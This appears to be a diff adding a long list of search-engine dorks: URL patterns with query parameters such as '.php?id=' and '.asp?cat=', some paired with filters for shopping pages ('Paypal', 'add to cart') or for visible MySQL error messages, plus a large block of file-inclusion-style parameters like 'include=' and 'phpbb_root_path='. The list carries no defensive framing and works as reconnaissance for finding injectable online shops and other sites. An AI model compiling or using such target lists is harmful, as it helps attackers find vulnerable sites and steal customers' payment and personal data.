+e_board/modifyform.html?code=
+community/calendar-event-fr.asp?id=
+products.asp?p=
+news.asp?id=
+view/7/9628/1.html?reply=
+product_details.asp?prodid=
+catalog/product.asp?pid=
+rating.asp?id=
+?page=
+catalog/main.asp?cat_id=
+index.asp?page=
+detail.asp?prodid=
+products/product.asp?pid=
+news.asp?id=
+book_detail.asp?BookID=
+catalog/main.asp?cat_id=
+catalog/main.asp?cat_id=
+default.asp?cPath=
+catalog/main.asp?cat_id=
+catalog/main.asp?cat_id=
+category.asp?catid=
+categories.asp?cat=
+categories.asp?cat=
+detail.asp?prodID=
+detail.asp?id=
+category.asp?id=
+hm/inside.asp?id=
+index.asp?area_id=
+gallery.asp?id=
+products.asp?cat=
+products.asp?cat=
+media/pr.asp?id=
+books/book.asp?proj_nr=
+products/card.asp?prodID=
+general.asp?id=
+news.asp?t=
+usb/devices/showdev.asp?id=
+content/detail.asp?id=
+templet.asp?acticle_id=
+news/news/title_show.asp?id=
+product.asp?id=
+index.asp?url=
+cryolab/content.asp?cid=
+ls.asp?id=
+s.asp?w=
+abroad/page.asp?cid=
+bayer/dtnews.asp?id=
+news/temp.asp?id=
+index.asp?url=
+book/bookcover.asp?bookid=
+index.asp/en/component/pvm/?view=
+product/list.asp?pid=
+cats.asp?cat=
+software_categories.asp?cat_id=
+print.asp?sid=
+docDetail.aspx?chnum=
+index.asp?section=
+index.asp?page=
+index.asp?page=
+en/publications.asp?id=
+events/detail.asp?ID=
+forum/profile.asp?id=
+media/pr.asp?id=
+content.asp?ID=
+cloudbank/detail.asp?ID=
+pages.asp?id=
+news.asp?id=
+beitrag_D.asp?id=
+content/index.asp?id=
+index.asp?i=
+?action=
+index.asp?page=
+beitrag_F.asp?id=
+index.asp?pageid=
+page.asp?modul=
+detail.asp?id=
+index.asp?w=
+index.asp?modus=
+news.asp?id=
+news.asp?id=
+aktuelles/meldungen-detail.asp?id=
+item.asp?id=
+obio/detail.asp?id=
+page/de/produkte/produkte.asp?prodID=
+packages_display.asp?ref=
+shop/index.asp?cPath=
+modules.asp?bookid=
+product-range.asp?rangeID=
+en/news/fullnews.asp?newsid=
+deal_coupon.asp?cat_id=
+show.asp?id=
+blog/index.asp?idBlog=
+redaktion/whiteteeth/detail.asp?nr=
+HistoryStore/pages/item.asp?itemID=
+aktuelles/veranstaltungen/detail.asp?id=
+tecdaten/showdetail.asp?prodid=
+?id=
+rating/stat.asp?id=
+content.asp?id=
+viewapp.asp?id=
+item.asp?id=
+news/newsitem.asp?newsID=
+FernandFaerie/index.asp?c=
+show.asp?id=
+?cat=
+categories.asp?cat=
+category.asp?c=
+
+product_info.asp?id=
+prod.asp?cat=
+store/product.asp?productid=
+browsepr.asp?pr=
+product-list.asp?cid=
+products.asp?cat_id=
+product.asp?ItemID=
+category.asp?c=
+main.asp?id=
+article.asp?id=
+showproduct.asp?productId=
+view_item.asp?item=
+skunkworks/content.asp?id=
+index.asp?id=
+item_show.asp?id=
+publications.asp?Id=
+index.asp?t=
+view_items.asp?id=
+portafolio/portafolio.asp?id=
+YZboard/view.asp?id=
+index_en.asp?ref=
+index_en.asp?ref=
+category.asp?id_category=
+main.asp?id=
+main.asp?id=
+calendar/event.asp?id=
+default.asp?cPath=
+pages/print.asp?id=
+index.asp?pg_t=
+_news/news.asp?id=
+forum/showProfile.asp?id=
+fr/commande-liste-categorie.asp?panier=
+downloads/shambler.asp?id=
+sinformer/n/imprimer.asp?id=
+More_Details.asp?id=
+directory/contenu.asp?id_cat=
+properties.asp?id_cat=
+forum/showProfile.asp?id=
+downloads/category.asp?c=
+index.asp?cat=
+product_info.asp?products_id=
+product_info.asp?products_id=
+product-list.asp?category_id=
+detail.asp?siteid=
+projects/event.asp?id=
+view_items.asp?id=
+more_details.asp?id=
+melbourne_details.asp?id=
+more_details.asp?id=
+detail.asp?id=
+more_details.asp?id=
+home.asp?cat=
+idlechat/message.asp?id=
+detail.asp?id=
+print.asp?sid=
+more_details.asp?id=
+default.asp?cPath=
+events/event.asp?id=
+brand.asp?id=
+toynbeestudios/content.asp?id=
+show-book.asp?id=
+more_details.asp?id=
+store/default.asp?cPath=
+property.asp?id=
+product_details.asp?id=
+more_details.asp?id=
+view-event.asp?id=
+content.asp?id=
+book.asp?id=
+page/venue.asp?id=
+print.asp?sid=
+colourpointeducational/more_details.asp?id=
+print.asp?sid=
+browse/book.asp?journalID=
+section.asp?section=
+bookDetails.asp?id=
+profiles/profile.asp?profileid=
+event.asp?id=
+gallery.asp?id=
+category.asp?CID=
+corporate/newsreleases_more.asp?id=
+print.asp?id=
+view_items.asp?id=
+more_details.asp?id=
+county-facts/diary/vcsgen.asp?id=
+idlechat/message.asp?id=
+podcast/item.asp?pid=
+products.asp?act=
+details.asp?prodId=
+socsci/events/full_details.asp?id=
+ourblog.asp?categoryid=
+mall/more.asp?ProdID=
+archive/get.asp?message_id=
+review/review_form.asp?item_id=
+english/publicproducts.asp?groupid=
+news_and_notices.asp?news_id=
+rounds-detail.asp?id=
+gig.asp?id=
+board/view.asp?no=
+index.asp?modus=
+news_item.asp?id=
+rss.asp?cat=
+products/product.asp?id=
+details.asp?ProdID=
+els_/product/product.asp?id=
+store/description.asp?iddesc=
+socsci/news_items/full_story.asp?id=
+modules/forum/index.asp?topic_id=
+feature.asp?id=
+products/Blitzball.htm?id=
+profile_print.asp?id=
+questions.asp?questionid=
+html/scoutnew.asp?prodid=
+main/index.asp?action=
+********.asp?cid=
+********.asp?cid=
+news.asp?type=
+index.asp?page=
+viewthread.asp?tid=
+summary.asp?PID=
+news/latest_news.asp?cat_id=
+index.asp?cPath=
+category.asp?CID=
+index.asp?pid=
+more_details.asp?id=
+specials.asp?osCsid=
+search/display.asp?BookID=
+articles.asp?id=
+print.asp?sid=
+page.asp?id=
+more_details.asp?id=
+newsite/pdf_show.asp?id=
+shop/category.asp?cat_id=
+shopcafe-shop-product.asp?bookId=
+shop/books_detail.asp?bookID=
+index.asp?cPath=
+more_details.asp?id=
+news.asp?id=
+more_details.asp?id=
+shop/books_detail.asp?bookID=
+more_details.asp?id=
+blog.asp?blog=
+index.asp?pid=
+prodotti.asp?id_cat=
+category.asp?CID=
+more_details.asp?id=
+poem_list.asp?bookID=
+more_details.asp?id=
+content.asp?categoryId=
+authorDetails.asp?bookID=
+press_release.asp?id=
+item_list.asp?cat_id=
+colourpointeducational/more_details.asp?id=
+index.asp?pid=
+download.asp?id=
+shop/category.asp?cat_id=
+i-know/content.asp?page=
+store/index.asp?cat_id=
+yacht_search/yacht_view.asp?pid=
+pharmaxim/category.asp?cid=
+print.asp?sid=
+specials.asp?osCsid=
+store.asp?cat_id=
+category.asp?cid=
+displayrange.asp?rangeid=
+product.asp?id=
+csc/news-details.asp?cat=
+products-display-details.asp?prodid=
+stockists_list.asp?area_id=
+news/newsitem.asp?newsID=
+index.asp?pid=
+newsitem.asp?newsid=
+category.asp?id=
+news/newsitem.asp?newsID=
+details.asp?prodId=
+publications/publication.asp?id=
+purelydiamond/products/category.asp?cat=
+category.asp?cid=
+product/detail.asp?id=
+news/newsitem.asp?newsID=
+details.asp?prodID=
+item.asp?item_id=
+edition.asp?area_id=
+page.asp?area_id=
+view_newsletter.asp?id=
+library.asp?cat=
+categories.asp?cat=
+page.asp?area_id=
+categories.asp?cat=
+publications.asp?id=
+item.asp?sub_id=
+page.asp?area_id=
+page.asp?area_id=
+category.asp?catid=
+content.asp?cID=
+newsitem.asp?newsid=
+frontend/category.asp?id_category=
+news/newsitem.asp?newsID=
+things-to-do/detail.asp?id=
+page.asp?area_id=
+page.asp?area_id=
+listing.asp?cat=
+item.asp?iid=
+customer/home.asp?cat=
+staff/publications.asp?sn=
+news/newsitem.asp?newsID=
+library.asp?cat=
+main/index.asp?uid=
+library.asp?cat=
+shop/eventshop/product_detail.asp?itemid=
+news/newsitem.asp?newsID=
+news/newsitem.asp?newsID=
+library.asp?cat=
+FullStory.asp?Id=
+publications.asp?ID=
+publications/book_reviews/full_review.asp?id=
+newsitem.asp?newsID=
+newsItem.asp?newsId=
+site/en/list_service.asp?cat=
+page.asp?area_id=
+product.asp?ProductID=
+releases_headlines_details.asp?id=
+product.asp?shopprodid=
+product.asp?productid=
+product.asp?product=
+product.asp?product_id=
+productlist.asp?id=
+product.asp?shopprodid=
+garden_equipment/pest-weed-control/product.asp?pr=
+product.asp?shopprodid=
+browsepr.asp?pr=
+productlist.asp?id=
+kshop/product.asp?productid=
+product.asp?pid=
+showproduct.asp?prodid=
+product.asp?productid=
+productlist.asp?id=
+index.asp?pageId=
+productlist.asp?tid=
+product-list.asp?id=
+onlinesales/product.asp?product_id=
+garden_equipment/Fruit-Cage/product.asp?pr=
+product.asp?shopprodid=
+product_info.asp?products_id=
+productlist.asp?tid=
+showsub.asp?id=
+productlist.asp?fid=
+products.asp?cat=
+products.asp?cat=
+product-list.asp?id=
+product.asp?sku=
+store/product.asp?productid=
+products.asp?cat=
+productList.asp?cat=
+product_detail.asp?product_id=
+product.asp?pid=
+wiki/pmwiki.asp?page****=
+summary.asp?PID=
+productlist.asp?grpid=
+cart/product.asp?productid=
+db/CART/product_details.asp?product_id=
+ProductList.asp?id=
+products/product.asp?id=
+product.asp?shopprodid=
+product_info.asp?products_id=
+product_ranges_view.asp?ID=
+cei/cedb/projdetail.asp?projID=
+products.asp?DepartmentID=
+product.asp?shopprodid=
+product.asp?shopprodid=
+product_info.asp?products_id=
+index.asp?news=
+education/content.asp?page=
+Interior/productlist.asp?id=
+products.asp?categoryID=
+modules.asp?****=
+message/comment_threads.asp?postID=
+artist_art.asp?id=
+products.asp?cat=
+index.asp?option=
+ov_tv.asp?item=
+index.asp?lang=
+showproduct.asp?cat=
+index.asp?lang=
+product.asp?bid=
+product.asp?bid=
+cps/rde/xchg/tm/hs.xsl/liens_detail.html?lnkId=
+item_show.asp?lid=
+?pagerequested=
+downloads.asp?id=
+print.asp?sid=
+print.asp?sid=
+product.asp?intProductID=
+productList.asp?id=
+product.asp?intProductID=
+more_details.asp?id=
+more_details.asp?id=
+books.asp?id=
+index.asp?offs=
+mboard/replies.asp?parent_id=
+Computer Science.asp?id=
+news.asp?id=
+pdf_post.asp?ID=
+reviews.asp?id=
+art.asp?id=
+prod.asp?cat=
+event_info.asp?p=
+view_items.asp?id=
+home.asp?cat=
+item_book.asp?CAT=
+www/index.asp?page=
+schule/termine.asp?view=
+goods_detail.asp?data=
+storemanager/contents/item.asp?page_code=
+view_items.asp?id=
+customer/board.htm?mode=
+help/com_view.html?code=
+n_replyboard.asp?typeboard=
+eng_board/view.asp?T****=
+prev_results.asp?prodID=
+bbs/view.asp?no=
+gnu/?doc=
+zb/view.asp?uid=
+global/product/product.asp?gubun=
+inurl:.php?cat=+intext:Paypal+site:UK
+
+inurl:.php?cat=+intext:/Buy Now/+site:.net
+
+inurl:.php?cid=+intext:online+betting
+
+inurl:.php?id= intext:View cart
+
+inurl:.php?id= intext:Buy Now
+
+inurl:.php?id= intext:add to cart
+
+inurl:.php?id= intext:shopping
+
+inurl:.php?id= intext:boutique
+
+inurl:.php?id= intext:/store/
+
+inurl:.php?id= intext:/shop/
+
+inurl:.php?id= intext:toys
+
+inurl:.php?cid=
+
+inurl:.php?cid= intext:shopping
+
+inurl:.php?cid= intext:add to cart
+
+inurl:.php?cid= intext:Buy Now
+
+inurl:.php?cid= intext:View cart
+
+inurl:.php?cid= intext:boutique
+
+inurl:.php?cid= intext:/store/
+
+inurl:.php?cid= intext:/shop/
+
+inurl:.php?cid= intext:Toys
+
+inurl:.php?cat=
+
+inurl:.php?cat= intext:shopping
+
+inurl:.php?cat= intext:add to cart
+
+inurl:.php?cat= intext:Buy Now
+
+inurl:.php?cat= intext:View cart
+
+inurl:.php?cat= intext:boutique
+
+ inurl:.php?cat= intext:/store/
+
+inurl:.php?cat= intext:/shop/
+
+inurl:.php?cat= intext:Toys
+
+inurl:.php?catid=
+
+inurl:.php?catid= intext:View cart
+
+inurl:.php?catid= intext:Buy Now
+
+inurl:.php?catid= intext:add to cart
+
+inurl:.php?catid= intext:shopping
+
+inurl:.php?catid= intext:boutique
+
+inurl:.php?catid= intext:/store/
+
+inurl:.php?catid= intext:/shop/
+
+inurl:.php?catid= intext:Toys
+
+inurl:.php?categoryid=
+
+inurl:.php?categoryid= intext:View cart
+
+inurl:.php?categoryid= intext:Buy Now
+
+inurl:.php?categoryid= intext:add to cart
+
+inurl:.php?categoryid= intext:shopping
+
+inurl:.php?categoryid= intext:boutique
+
+inurl:.php?categoryid= intext:/store/
+
+inurl:.php?categoryid= intext:/shop/
+
+inurl:.php?categoryid= intext:Toys
+
+inurl:.php?pid=
+
+inurl:.php?pid= intext:shopping
+
+inurl:.php?pid= intext:add to cart
+
+inurl:.php?pid= intext:Buy Now
+
+inurl:.php?pid= intext:View cart
+
+inurl:.php?pid= intext:boutique
+
+cat.asp?cat=
+productlist.asp?catalogid=
+
+Category.asp?category_id=
+
+Category.cfm?category_id=
+
+category.asp?cid=
+
+category.cfm?cid=
+
+category.asp?cat=
+
+category.cfm?cat=
+
+category.asp?id=
+
+index.cfm?pageid=
+
+category.asp?catid=
+
+Category.asp?c=
+
+Category.cfm?c=
+
+productlist.cfm?catalogid=
+
+productlist.asp?catalogid=
+
+viewitem.asp?catalogid=
+
+viewitem.cfm?catalogid=
+
+catalog.cfm?catalogId=
+
+catalog.asp?catalogId=
+
+department.cfm?dept=
+
+department.asp?dept=
+
+itemdetails.cfm?catalogId=
+
+itemdetails.asp?catalogId=
+
+product_detail.asp?catalogid=
+
+product_detail.cfm?catalogid=
+
+product_list.asp?catalogid=
+
+product_list.cfm?catalogid=
+
+ShowProduct.cfm?CatID=
+
+ShowProduct.asp?CatID=
+
+search_results.cfm?txtsearchParamCat=
+
+search_results.asp?txtsearchParamCat=
+
+itemdetails.cfm?catalogId=
+
+itemdetails.asp?catalogId=
+
+store-page.cfm?go=
+
+store-page.asp?go=
+
+Detail.cfm?CatalogID=
+
+Detail.asp?CatalogID=
+
+browse.cfm?category_id=
+
+view.cfm?category_id=
+
+products.cfm?category_id=
+
+index.cfm?Category_ID=
+
+detail.cfm?id=
+
+category.cfm?id=
+
+showitems.cfm?category_id=
+
+ViewProduct.asp?PID=
+
+ViewProduct.cfm?PID=
+
+shopdisplayproducts.asp?catalogid=
+
+shopdisplayproducts.cfn?catalogid=
+
+displayproducts.cfm?category_id=
+
+displayproducts.asp?category_id=
+
+DisplayProducts.asp?prodcat=
+
+DisplayProducts.cfm?prodcat=x
+
+productDetail.cfm?ProductID=
+
+products.php?subcat_id=
+
+showitem.cfm?id=21
+
+productdetail.cfm?pid=
+
+default.cfm?action=46
+
+products_accessories.asp?CatId=
+
+Store_ViewProducts.asp?Cat=
+
+category.cfm?categoryID=
+
+category.asp?category=
+
+tepeecart.cfm?shopid=
+
+view_product.asp?productID=
+
+ProductDetails.asp?prdId=12
+
+products.cfm?ID=
+
+detail.asp?product_id=
+
+product_detail.asp?product_id=
+
+products.php?subcat_id=
+
+product.php?product_id=
+
+view_product.cfm?productID=
+
+product_details.asp?prodid=
+
+shopdisplayproducts.cfm?id=
+
+displayproducts.cfm?id=
+trainers.php?id=
+play_old.php?id=
+declaration_more.php?decl_id=
+Pageid=
+games.php?id=
+newsDetail.php?id=
+staff_id=
+historialeer.php?num=
+product-item.php?id=
+news_view.php?id=
+humor.php?id=
+communique_detail.php?id=
+sem.php3?id=
+opinions.php?id=
+spr.php?id=
+pages.php?id=
+chappies.php?id=
+prod_detail.php?id=
+viewphoto.php?id=
+view.php?id=
+website.php?id=
+hosting_info.php?id=
+gery.php?id=
+detail.php?ID=
+publications.php?id=
+Productinfo.php?id=
+releases.php?id=
+ray.php?id=
+produit.php?id=
+pop.php?id=
+shopping.php?id=
+productdetail.php?id=
+post.php?id=
+section.php?id=
+theme.php?id=
+page.php?id=
+shredder-categories.php?id=
+product_ranges_view.php?ID=
+shop_category.php?id=
+channel_id=
+newsid=
+news_display.php?getid=
+ages.php?id=
+clanek.php4?id=
+review.php?id=
+iniziativa.php?in=
+curriculum.php?id=
+labels.php?id=
+look.php?ID=
+galeri_info.php?l=
+tekst.php?idt=
+newscat.php?id=
+newsticker_info.php?idn=
+rubrika.php?idr=
+offer.php?idf=
+id= & intext:Warning: mysql_fetch_array()
+id= & intext:Warning: getimagesize()
+id= & intext:Warning: session_start()
+id= & intext:Warning: mysql_num_rows()
+id= & intext:Warning: mysql_query()
+id= & intext:Warning: array_merge()
+id= & intext:Warning: preg_match()
+id= & intext:Warning: ilesize()
+id= & intext:Warning: filesize()
+index.php?id=
+buy.php?category=
+article.php?ID=
+play_old.php?id=
+newsitem.php?num=
+top10.php?cat=
+historialeer.php?num=
+reagir.php?num=
+Stray-Questions-View.php?num=
+forum_bds.php?num=
+game.php?id=
+view_product.php?id=
+sw_comment.php?id=
+news.php?id=
+avd_start.php?avd=
+event.php?id=
+sql.php?id=
+news_view.php?id=
+select_biblio.php?id=
+humor.php?id=
+ogl_inet.php?ogl_id=
+fiche_spectacle.php?id=
+communique_detail.php?id=
+sem.php3?id=
+kategorie.php4?id=
+faq2.php?id=
+show_an.php?id=
+preview.php?id=
+loadpsb.php?id=
+opinions.php?id=
+spr.php?id=
+announce.php?id=
+participant.php?id=
+download.php?id=
+main.php?id=
+review.php?id=
+chappies.php?id=
+read.php?id=
+prod_detail.php?id=
+article.php?id=
+person.php?id=
+productinfo.php?id=
+showimg.php?id=
+view.php?id=
+website.php?id=
+hosting_info.php?id=
+gery.php?id=
+rub.php?idr=
+view_faq.php?id=
+artikelinfo.php?id=
+detail.php?ID=
+index.php?=
+profile_view.php?id=
+category.php?id=
+publications.php?id=
+fellows.php?id=
+downloads_info.php?id=
+prod_info.php?id=
+shop.php?do=part&id=
+collectionitem.php?id=
+band_info.php?id=
+product.php?id=
+releases.php?id=
+ray.php?id=
+produit.php?id=
+pop.php?id=
+shopping.php?id=
+productdetail.php?id=
+post.php?id=
+viewshowdetail.php?id=
+clubpage.php?id=
+memberInfo.php?id=
+section.php?id=
+theme.php?id=
+page.php?id=
+shredder-categories.php?id=
+tradeCategory.php?id=
+product_ranges_view.php?ID=
+shop_category.php?id=
+transcript.php?id=
+channel_id=
+item_id=
+newsid=
+trainers.php?id=
+news-full.php?id=
+news_display.php?getid=
+index2.php?option=
+readnews.php?id=
+newsone.php?id=
+product-item.php?id=
+pages.php?id=
+clanek.php4?id=
+viewapp.php?id=
+
+viewphoto.php?id=
+galeri_info.php?l=
+iniziativa.php?in=
+curriculum.php?id=
+labels.php?id=
+story.php?id=
+look.php?ID=
+aboutbook.php?id=
+id= & intext:Warning: mysql_fetch_assoc()
+id= & intext:Warning: is_writable()
+id= & intext:Warning: Unknown()
+id= & intext:Warning: mysql_result()
+id= & intext:Warning: pg_exec()
+id= & intext:Warning: require()
+buy.php?category=
+pageid=
+page.php?file=
+show.php?id=
+newsitem.php?num=
+readnews.php?id=
+top10.php?cat=
+reagir.php?num=
+Stray-Questions-View.php?num=
+forum_bds.php?num=
+game.php?id=
+view_product.php?id=
+sw_comment.php?id=
+news.php?id=
+avd_start.php?avd=
+event.php?id=
+sql.php?id=
+select_biblio.php?id=
+ogl_inet.php?ogl_id=
+fiche_spectacle.php?id=
+kategorie.php4?id=
+faq2.php?id=
+show_an.php?id=
+loadpsb.php?id=
+announce.php?id=
+participant.php?id=
+download.php?id=
+article.php?id=
+person.php?id=
+productinfo.php?id=
+showimg.php?id=
+rub.php?idr=
+view_faq.php?id=
+artikelinfo.php?id=
+index.php?=
+profile_view.php?id=
+category.php?id=
+fellows.php?id=
+downloads_info.php?id=
+prod_info.php?id=
+shop.php?do=part&id=
+collectionitem.php?id=
+band_info.php?id=
+product.php?id=
+viewshowdetail.php?id=
+clubpage.php?id=
+memberInfo.php?id=
+tradeCategory.php?id=
+transcript.php?id=
+item_id=
+news-full.php?id=
+aboutbook.php?id=
+preview.php?id=
+material.php?id=
+read.php?id=
+viewapp.php?id=
+story.php?id=
+newsone.php?id=
+rubp.php?idr=
+art.php?idm=
+title.php?id=
+index1.php?modo=
+include.php?*[*]*=
+nota.php?pollname=
+index3.php?p=
+padrao.php?pre=
+home.php?pa=
+main.php?type=
+sitio.php?start=
+*.php?include=
+general.php?xlink=
+show.php?go=
+nota.php?ki=
+down*.php?oldal=
+layout.php?disp=
+enter.php?chapter=
+base.php?incl=
+enter.php?mod=
+show.php?corpo=
+head.php?*[*]*=
+info.php?strona=
+template.php?str=
+main.php?doshow=
+view.php?*[*]*=
+index.php?to=
+page.php?cmd=
+view.php?b=
+info.php?option=
+show.php?x=
+template.php?texto=
+index3.php?ir=
+print.php?chapter=
+file.php?inc=
+file.php?cont=
+view.php?cmd=
+include.php?chapter=
+path.php?my=
+principal.php?param=
+general.php?menue=
+index1.php?b=
+info.php?chapter=
+nota.php?chapter=
+general.php?include=
+start.php?addr=
+index1.php?qry=
+index1.php?loc=
+page.php?addr=
+index1.php?dir=
+principal.php?pr=
+press.php?seite=
+head.php?cmd=
+home.php?sec=
+home.php?category=
+standard.php?cmd=
+mod*.php?thispage=
+base.php?to=
+view.php?choix=
+base.php?panel=
+template.php?mod=
+info.php?j=
+blank.php?pref=
+sub*.php?channel=
+standard.php?in=
+general.php?cmd=
+pagina.php?panel=
+template.php?where=
+path.php?channel=
+gery.php?seccion=
+page.php?tipo=
+sitio.php?rub=
+pagina.php?u=
+file.php?ir=
+*inc*.php?sivu=
+path.php?start=
+page.php?chapter=
+home.php?recipe=
+enter.php?pname=
+layout.php?path=
+print.php?open=
+mod*.php?channel=
+down*.php?phpbb_root_path=
+*inc*.php?str=
+gery.php?phpbb_root_path=
+include.php?middlePart=
+sub*.php?destino=
+info.php?read=
+home.php?sp=
+main.php?strona=
+sitio.php?get=
+sitio.php?index=
+index3.php?option=
+enter.php?a=
+main.php?second=
+print.php?pname=
+blank.php?itemnav=
+blank.php?pagina=
+index1.php?d=
+down*.php?where=
+*inc*.php?include=
+path.php?pre=
+home.php?loader=
+start.php?eval=
+index.php?disp=
+head.php?mod=
+sitio.php?section=
+nota.php?doshow=
+home.php?seite=
+home.php?a=
+page.php?url=
+pagina.php?left=
+layout.php?c=
+principal.php?goto=
+standard.php?base_dir=
+home.php?where=
+page.php?sivu=
+*inc*.php?adresa=
+padrao.php?str=
+include.php?my=
+show.php?home=
+index.php?load=
+index3.php?rub=
+sub*.php?str=
+start.php?index=
+nota.php?mod=
+sub*.php?mid=
+index1.php?*[*]*=
+pagina.php?oldal=
+padrao.php?loc=
+padrao.php?rub=
+page.php?incl=
+gery.php?disp=
+nota.php?oldal=
+include.php?u=
+principal.php?pagina=
+print.php?choix=
+head.php?filepath=
+include.php?corpo=
+sub*.php?action=
+head.php?pname=
+press.php?dir=
+show.php?xlink=
+file.php?left=
+nota.php?destino=
+general.php?module=
+index3.php?redirect=
+down*.php?param=
+default.php?ki=
+padrao.php?h=
+padrao.php?read=
+mod*.php?cont=
+
+index1.php?l=
+down*.php?pr=
+gery.php?viewpage=
+template.php?load=
+nota.php?pr=
+padrao.php?destino=
+index2.php?channel=
+principal.php?opcion=
+start.php?str=
+press.php?*[*]*=
+index.php?ev=
+pagina.php?pre=
+nota.php?content=
+include.php?adresa=
+sitio.php?t=
+index.php?sivu=
+principal.php?q=
+path.php?ev=
+print.php?module=
+index.php?loc=
+nota.php?basepath=
+padrao.php?tipo=
+index2.php?in=
+principal.php?eval=
+file.php?qry=
+info.php?t=
+enter.php?play=
+general.php?var=
+principal.php?s=
+standard.php?pagina=
+standard.php?subject=
+base.php?second=
+head.php?inc=
+pagina.php?basepath=
+main.php?pname=
+*inc*.php?modo=
+include.php?goto=
+file.php?pg=
+head.php?g=
+general.php?header=
+start.php?*root*=
+enter.php?pref=
+index3.php?open=
+start.php?module=
+main.php?load=
+enter.php?pg=
+padrao.php?redirect=
+pagina.php?my=
+gery.php?pre=
+enter.php?w=
+info.php?texto=
+enter.php?open=
+base.php?rub=
+gery.php?*[*]*=
+include.php?cmd=
+standard.php?dir=
+layout.php?page=
+index3.php?pageweb=
+include.php?numero=
+path.php?destino=
+index3.php?home=
+default.php?seite=
+path.php?eval=
+base.php?choix=
+template.php?cont=
+info.php?pagina=
+default.php?x=
+default.php?option=
+gery.php?ki=
+down*.php?second=
+blank.php?path=
+pagina.php?v=
+file.php?pollname=
+index3.php?var=
+layout.php?goto=
+pagina.php?incl=
+home.php?action=
+include.php?oldal=
+print.php?left=
+print.php?u=
+nota.php?v=
+home.php?str=
+press.php?panel=
+page.php?mod=
+default.php?param=
+down*.php?texto=
+mod*.php?dir=
+view.php?where=
+blank.php?subject=
+path.php?play=
+base.php?l=
+index2.php?rub=
+general.php?opcion=
+layout.php?xlink=
+padrao.php?name=
+pagina.php?nivel=
+default.php?oldal=
+template.php?k=
+main.php?chapter=
+layout.php?chapter=
+layout.php?incl=
+include.php?url=
+base.php?sivu=
+index.php?link=
+sub*.php?cont=
+info.php?oldal=
+general.php?rub=
+default.php?str=
+head.php?ev=
+sub*.php?path=
+view.php?page=
+main.php?j=
+index2.php?basepath=
+gery.php?qry=
+main.php?url=
+default.php?incl=
+show.php?redirect=
+index1.php?pre=
+general.php?base_dir=
+start.php?in=
+show.php?abre=
+index1.php?home=
+home.php?ev=
+index2.php?ki=
+base.php?pag=
+default.php?ir=
+general.php?qry=
+index2.php?home=
+press.php?nivel=
+enter.php?pr=
+blank.php?loader=
+start.php?cmd=
+padrao.php?d=
+sitio.php?recipe=
+principal.php?read=
+standard.php?showpage=
+main.php?pg=
+page.php?panel=
+press.php?addr=
+template.php?s=
+main.php?tipo=
+*inc*.php?ev=
+padrao.php?page=
+show.php?thispage=
+home.php?secao=
+main.php?start=
+enter.php?mid=
+press.php?id=
+main.php?inc=
+index3.php?cmd=
+index.php?pname=
+press.php?subject=
+include.php?sec=
+index3.php?xlink=
+general.php?texto=
+index3.php?go=
+index.php?cmd=
+index3.php?disp=
+index3.php?left=
+sub*.php?middle=
+show.php?modo=
+index1.php?pagina=
+head.php?left=
+enter.php?phpbb_root_path=
+show.php?z=
+start.php?basepath=
+blank.php?strona=
+template.php?y=
+page.php?where=
+layout.php?category=
+index1.php?my=
+principal.php?phpbb_root_path=
+nota.php?channel=
+page.php?choix=
+start.php?xlink=
+home.php?k=
+standard.php?phpbb_root_path=
+principal.php?middlePart=
+mod*.php?m=
+index.php?recipe=
+template.php?path=
+pagina.php?dir=
+sitio.php?abre=
+index1.php?recipe=
+blank.php?page=
+sub*.php?category=
+*inc*.php?bOdy=
+enter.php?middle=
+home.php?path=
+down*.php?pre=
+base.php?w=
+main.php?path=
+nota.php?ir=
+press.php?link=
+gery.php?pollname=
+down*.php?open=
+down*.php?pageweb=
+default.php?eval=
+view.php?showpage=
+show.php?get=
+sitio.php?tipo=
+layout.php?cont=
+default.php?destino=
+padrao.php?seccion=
+down*.php?r=
+main.php?param=
+standard.php?e=
+down*.php?in=
+nota.php?include=
+sitio.php?secao=
+print.php?my=
+general.php?abre=
+general.php?link=
+default.php?id=
+standard.php?panel=
+show.php?channel=
+enter.php?r=
+index3.php?phpbb_root_path=
+gery.php?where=
+head.php?middle=
+sub*.php?load=
+gery.php?sp=
+show.php?chapter=
+sub*.php?b=
+general.php?adresa=
+print.php?goto=
+sub*.php?sp=
+template.php?doshow=
+padrao.php?base_dir=
+index2.php?my=
+include.php?w=
+start.php?op=
+main.php?section=
+view.php?header=
+layout.php?menue=
+head.php?y=
+sub*.php?content=
+show.php?type=
+base.php?id=
+mod*.php?qry=
+default.php?strona=
+sitio.php?chapter=
+gery.php?index=
+nota.php?h=
+page.php?oldal=
+enter.php?panel=
+blank.php?t=
+start.php?pollname=
+sub*.php?module=
+enter.php?thispage=
+mod*.php?index=
+sitio.php?r=
+sub*.php?play=
+index2.php?doshow=
+index2.php?chapter=
+show.php?path=
+gery.php?to=
+info.php?base_dir=
+gery.php?abre=
+gery.php?pag=
+view.php?channel=
+default.php?mod=
+index.php?op=
+general.php?pre=
+padrao.php?type=
+template.php?pag=
+standard.php?pre=
+blank.php?ref=
+down*.php?z=
+general.php?inc=
+home.php?read=
+pagina.php?section=
+default.php?basepath=
+index.php?pre=
+sitio.php?pageweb=
+base.php?seite=
+*inc*.php?j=
+index2.php?filepath=
+file.php?type=
+index1.php?oldal=
+index2.php?second=
+index3.php?sekce=
+info.php?filepath=
+base.php?opcion=
+path.php?category=
+index3.php?start=
+start.php?rub=
+*inc*.php?i=
+blank.php?pre=
+general.php?channel=
+index2.php?OpenPage=
+page.php?section=
+mod*.php?middle=
+index1.php?goFile=
+blank.php?action=
+principal.php?loader=
+sub*.php?op=
+main.php?addr=
+start.php?mid=
+gery.php?secao=
+pagina.php?tipo=
+index.php?w=
+head.php?where=
+principal.php?tipo=
+press.php?loader=
+gery.php?showpage=
+gery.php?go=
+enter.php?start=
+press.php?lang=
+general.php?p=
+index.php?sekce=
+index2.php?get=
+sitio.php?go=
+include.php?cont=
+sub*.php?where=
+index3.php?index=
+path.php?recipe=
+info.php?loader=
+print.php?sp=
+page.php?phpbb_root_path=
+path.php?bOdy=
+principal.php?menue=
+print.php?cont=
+pagina.php?z=
+default.php?mid=
+blank.php?xlink=
+
+sub*.php?oldal=
+general.php?b=
+include.php?left=
+print.php?sivu=
+press.php?OpenPage=
+default.php?cont=
+general.php?pollname=
+template.php?nivel=
+enter.php?page=
+file.php?middle=
+standard.php?str=
+gery.php?get=
+main.php?v=
+down*.php?subject=
+enter.php?sivu=
+path.php?option=
+index.php?strona=
+index1.php?choix=
+index2.php?f=
+press.php?destino=
+pagina.php?channel=
+principal.php?b=
+home.php?include=
+head.php?numero=
+general.php?ref=
+main.php?dir=
+gery.php?cont=
+principal.php?type=
+file.php?param=
+default.php?secao=
